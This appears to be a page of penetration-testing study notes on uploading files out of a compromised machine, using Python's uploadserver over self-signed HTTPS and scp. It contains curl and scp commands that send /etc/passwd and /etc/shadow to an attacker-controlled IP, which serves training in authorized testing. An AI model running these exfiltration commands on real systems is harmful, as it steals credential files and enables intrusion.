Upload

Web Uploads

We can use uploadserver module which is an extended module of python http.server module. To install:

sudo python3 -m pip install --user uploadserver

Now we need to create a certificate. In this example, we are using a self-signed certificate.

openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'

We should make a directory seperate for this and keep the .pem file there:

mkdir https && cd https

Now we can run the command to setup our webserver:

sudo python3 -m uploadserver 443 --server-certificate ~/server.pem

Now, from the compromised machine we send a post request:

curl -X POST https://192.168.49.128/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure

We used the option --insecure because we used a self-signed certificate that we trust.

We can also use SimpleHTTPserver:

python3 -m http.server

SCP Uploads

We may find some companies that allow the SSH protocol (TCP/22) for outbound connections, and if that's the case, we can use an SSH server with the scp utility to upload files.

 scp /etc/passwd [email protected]:/home/htb-student/

PreviousDownload NextTransfer with Code

Last updated 1 year ago